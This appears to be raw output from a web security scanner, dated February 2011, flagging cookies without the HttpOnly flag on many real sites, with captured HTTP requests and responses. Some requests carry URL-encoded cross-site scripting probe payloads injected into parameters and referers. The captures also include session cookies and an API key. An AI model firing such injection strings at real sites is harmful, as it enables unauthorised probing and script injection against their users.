User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1
Host: www.qlipso.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Set-Cookie: ASPSESSIONIDASSQDSRS=GEHACPFBKDFJCIHPINDDAHOE; path=/
Cache-Control: private
Content-Length: 6395
Date: Thu, 03 Feb 2011 22:03:01 GMT
Connection: close
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /p-aasG6JkxVvmNA HTTP/1.1
Host: www.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Date: Thu, 03 Feb 2011 22:03:02 GMT
Expires: Wed, 02 Feb 2011 10:03:02 GMT
Cache-control: private, max-age=0
Set-Cookie: qcVisitor=1|69|1296770582348|0|NOTSET; Expires=Sat, 26-Jan-2041 22:03:02 GMT; Path=/
Set-Cookie: JSESSIONID=64B221D97727744347E466E5663A8A8D; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /spportal/spportalFlow.do?_flowExecutionKey=_c47FC5CD2-84B0-15BA-BBD6-7F2890FFCE5D_k1D7E1B65-A481-322E-8A3E-9052CB09A537%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x00029D)%3C%2Fscript%3E HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trafficSource="SP198c8\"; CstrStatus=U; campaign_track=BP%3AUpdate%20Your%20Profile%20Top
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1
Host: www.switchboard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /preview/194850/x22 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rest/v2/execute.xml?apiKey=5697781E-1C60-663B-FFD8-9B49D2B56D36&method=veoh.video.findByPermalink&permalink=v18978294NGnK88j8& HTTP/1.1
Host: www.veoh.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utmv=; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.1.10.1296766388; vvt="1&Fri, 04 Feb 2011 20:53:09 GMT"; __qca=P0-1750536792-1296766390251; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webplayed.xml?action=PlayerLoaded&videoSequence=1&userWhoEmbedded=anonymous&playSequence=0&collectionId=&autoPlay=true&percent=&playerVersion=flash/VeohPlayer-Freewheel.7.0.0.40&player=videodetails&inVeoh=true&flashVersion=WIN%2010,1,103,20&affiliateId=&cachebuster=0.22769851004704833&apiId=0E13378F-874E-DB67-3E0B-113A55BC57F9&positionTime=0&volumeLevel=NaN&totalVideos=1&truncated=false&videoId=18978294&idSource=veoh&bufferStateEntered=0&userTime=2.565&playTime=0&bufferTime=0&stopTime=2.565&pauseTime=0&playerSessionID=e5df0bf7-4865-174d-7ab5-b481ea4a57e3&client=false HTTP/1.1
Host: www.veoh.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utmv=; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.1.10.1296766388; vvt="1&Fri, 04 Feb 2011 20:53:09 GMT"; __qca=P0-1750536792-1296766390251; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; JSESSIONID=FA513D5C45F8F3409631CA9302C4270B
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /scanners/ HTTP/1.1 Host: www.waspbarcode.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 20:34:56 GMT Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "administrator@waspbarcode.com" on "2007.06.04T10:29-0500" exp "2011.06.04T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "administrator@waspbarcode.com" on "2007.06.04T10:29-0500" exp "2011.06.04T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "administrator@waspbarcode.com" on "2007.06.04T10:29-0500" exp "2011.06.04T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "administrator@waspbarcode.com" on "2007.06.04T10:29-0500" exp "2011.06.04T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "administrator@waspbarcode.com" on "2007.06.04T10:29-0500" exp "2011.06.04T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "administrator@waspbarcode.com" on "2007.06.04T10:29-0500" exp "2011.06.04T12:00-0500" r (l 0 s 0 v 0 o 0)) X-Powered-By: ASP.NET Content-Length: 60930 Content-Type: text/html Set-Cookie: Pop=Set=True; expires=Fri, 04-Feb-2011 20:34:56 GMT; path=/ Set-Cookie: WASP=firsttime=true&source=&originalid=411392716&sessionid=411392716; expires=Fri, 03-Feb-2012 20:34:56 GMT; path=/ Set-Cookie: ASPSESSIONIDCQBSCDRC=MMKFFIIBGDMFFEBNGPKMKPJL; path=/ Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <title>Barcode Scanners - Laser & Wireless by Wasp Barcode Technologies</ ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shareware/spow.asp HTTP/1.1 Host: www.wugnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 20:36:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 27 Content-Type: text/html Set-Cookie: ASPSESSIONIDSQQSBTTD=KPNKCKPAPFNMPLDOKMGFDEND; path=/ Cache-control: private
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /media/redir.php?prof=88&camp=4679&affcode=cr197235&cid=7085856551|166328|SmartDraw&mType=e&networkType=search&url[]=http%3A%2F%2Finfo.mindjet.com%2FMindManagerB.html%3Fcmpg%3DAmericas_-_Google_US_Competitors/x22 HTTP/1.1 Host: 102.xg4ken.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 20:31:19 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Set-Cookie: kenshoo_id=6de8bdeb-6bd9-2909-a31c-000018710444; expires=Wed, 04-May-2011 20:31:19 GMT; path=/; domain=.xg4ken.com Location: http://info.mindjet.com/MindManagerB.html?cmpg=Americas_-_Google_US_Competitors/x22 P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW" Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
The following cookies were issued by the application and do not have the HttpOnly flag set:
_uid="a104_5562153497824379009";expires=Fri, 03 Feb 2012 21:07:44 GMT;domain=.fwmrm.net;path=/;
_auv="g12288~1.1296767264.0,12720.1296767264.0,^";expires=Sat, 05 Mar 2011 21:07:44 GMT;domain=.fwmrm.net;path=/;
_cvr="1296767264^11894^sg12288~sg11948^0~0^0.000000~5.000000,";expires=Sat, 05 Mar 2011 21:07:44 GMT;domain=.fwmrm.net;path=/;
_vr="1296767252.0+7564699552021921.248599~249349~331220~,";expires=Sat, 05 Mar 2011 21:07:44 GMT;domain=.fwmrm.net;path=/;
_sc="sg12288.1296767252.1296767264.28800.0.5,";expires=Sat, 05 Mar 2011 21:07:44 GMT;domain=.fwmrm.net;path=/;
_wr="g12288";expires=Sat, 05 Mar 2011 21:07:44 GMT;domain=.fwmrm.net;path=/;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
_uid="a104_5562153497824379009";expires=Fri, 03 Feb 2012 21:07:32 GMT;domain=.fwmrm.net;path=/;
_vr="1296767252.0+7564699552021921.248599~249349~331220~,";expires=Sat, 05 Mar 2011 21:07:32 GMT;domain=.fwmrm.net;path=/;
_sc="sg12288.1296767252.1296767252.28800.0.0,";expires=Sat, 05 Mar 2011 21:07:32 GMT;domain=.fwmrm.net;path=/;
_wr="g12288";expires=Sat, 05 Mar 2011 21:07:32 GMT;domain=.fwmrm.net;path=/;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /-/spec/opensearch/1.1/ HTTP/1.1 Host: a9.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 20:31:21 GMT Server: Server Content-Type: text/html; charset=utf-8 Content-Length: 2727 Set-Cookie: a9locale=en_US; Domain=.a9.com; Path=/ Set-Cookie: a9Temp="{\"w\":\"m\"}"; Version=1; Domain=.a9.com; Path=/ Vary: Accept-Encoding,User-Agent Connection: close
<html> <head>
<script language="javascript" type="text/javascript"> <!-- var a9IsIE7 = true; var a9IsIE = true; var a9IsMoz = false; var a9IsSafari = false; var a9IsOpera = false;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Sports/wireStory HTTP/1.1 Host: abcnews.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:31:26 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: abc05 X-Powered-By: ASP.NET Set-Cookie: SWID=B93EDC68-F596-4509-B1FC-2C48F519C999; path=/; expires=Thu, 03-Feb-2031 20:31:23 GMT; domain=.go.com; Content-Length: 7679 Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en">
The following cookie was issued by the application and does not have the HttpOnly flag set:
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 04 Feb 2011 02:44:40 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ad/N3671.msnmidfunnel.com/B5159652.21;sz=1x1;pc=%5BTPAS_ID%5D;ord=2013940297? HTTP/1.1 Accept: */* Referer: http://www.msn.com/ Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: ad.doubleclick.net Proxy-Connection: Keep-Alive
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Date: Fri, 04 Feb 2011 02:29:40 GMT Location: http://s0.2mdn.net/viewad/998766/49-1x1.gif Cache-Control: no-cache Pragma: no-cache Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 04 Feb 2011 02:44:40 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Server: GFE/2.0 Content-Type: text/html
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ad/N6421.152847.MSN.COM/B5094800.20;abr=!ie4;abr=!ie5;sz=1x1;ord=1362100664? HTTP/1.1 Accept: */* Referer: http://www.msn.com/ Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: ad.doubleclick.net Proxy-Connection: Keep-Alive
Response
HTTP/1.1 302 Found P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Fri, 04 Feb 2011 02:29:41 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, must-revalidate Location: http://s0.2mdn.net/viewad/2850237/1x1.gif Content-Type: image/gif Set-Cookie: test_cookie=CheckForPermission; expires=Fri, 04-Feb-2011 02:44:41 GMT; path=/; domain=.doubleclick.net X-Content-Type-Options: nosniff Server: cafe Content-Length: 0 X-XSS-Protection: 1; mode=block
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/bpix?adv=1050&id=5&r= HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/bpix?adv=1050&id=5&r= HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_h9m4=h0l%3A86c%3A1; T_4mpe=h0h%3A86c%3A1; T_3q8t=h0l%3A86c%3A1; T_ax3f=h0h%3A86c%3A1; dly2=3-lg2agz-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2agz-1~1b4ykgj40t72i~i9b~4fqb~0-1~14288lsu2vxsy~i97~4fq7~q-1~1aao14q745q7r~i9b~4fqb~q-1~15stqp6ba7xf0~i9b~4fqb~13-; rth=2-lg22an-h0h~86c~1~1-h0l~86c~1~1-9tc~0~1~1-
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/bpix?adv=1050&id=5&r= HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/js?plid=23661 HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-82680071_1296770408,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=atf;tile=3;sz=300x250;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_ahzq=h0l%3A85m%3A1; T_km24=h0h%3A85m%3A1; dly2=3-lg2ag9-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2ag9-1~1aao14q745q7r~i9b~4fqb~0-1~15stqp6ba7xf0~i9b~4fqb~d-; rth=2-lg22an-h0h~85m~1~1-h0l~85m~1~1-9tc~0~1~1-
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/js?plid=23659 HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-28103178_1296770408,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=btf;tile=5;sz=160x600;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_ahzq=h0l%3A85m%3A1; T_km24=h0h%3A85m%3A1; dly2=3-lg2ag9-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2ag9-1~1aao14q745q7r~i9b~4fqb~0-1~15stqp6ba7xf0~i9b~4fqb~d-; rth=2-lg22an-h0h~85m~1~1-h0l~85m~1~1-9tc~0~1~1-
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/js?plid=23663 HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-14847884_1296770433,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_fg2y=h0l%3A85m%3A1; T_73th=h0h%3A85m%3A1; dly2=3-lg2ag9-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2ag9-1~14288lsu2vxsy~i97~4fq7~0-1~1aao14q745q7r~i9b~4fqb~0-1~15stqp6ba7xf0~i9b~4fqb~d-; rth=2-lg22an-h0h~85m~1~1-h0l~85m~1~1-9tc~0~1~1-
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/js?plid=23663 HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-5843489_1296770394,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296770389? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: T_4ffd=9tc%3A0%3A1; rth=2-lg22an-9tc~0~1~1-; uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/js?plid=23663 HTTP/1.1 Host: ad.trafficmp.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-36820622_1296770406,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid2=4f978e9b0-271c-47b8-9a97-caba692f0bb2-gjq1brxe; T_1g6v=h0l%3A859%3A1; T_kjvx=h0h%3A859%3A1; dly2=3-lg2afw-; dmg2=2-1fbsgynlre.pbz%7CS20752%7CWfbsgynlre+grpuabybtvrf+vap.%7CJ178%7CHHF%7CX769%7CIGK%7CR%40541.244%7CLqnyynf%7CDoebnqonaq%7CQ587.232%7CZfbsgynlre+grpuabybtvrf+vap.%7C-; hst2=3-lg2afw-1~15stqp6ba7xf0~i9b~4fqb~0-; rth=2-lg22an-h0h~859~1~1-h0l~859~1~1-9tc~0~1~1-
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
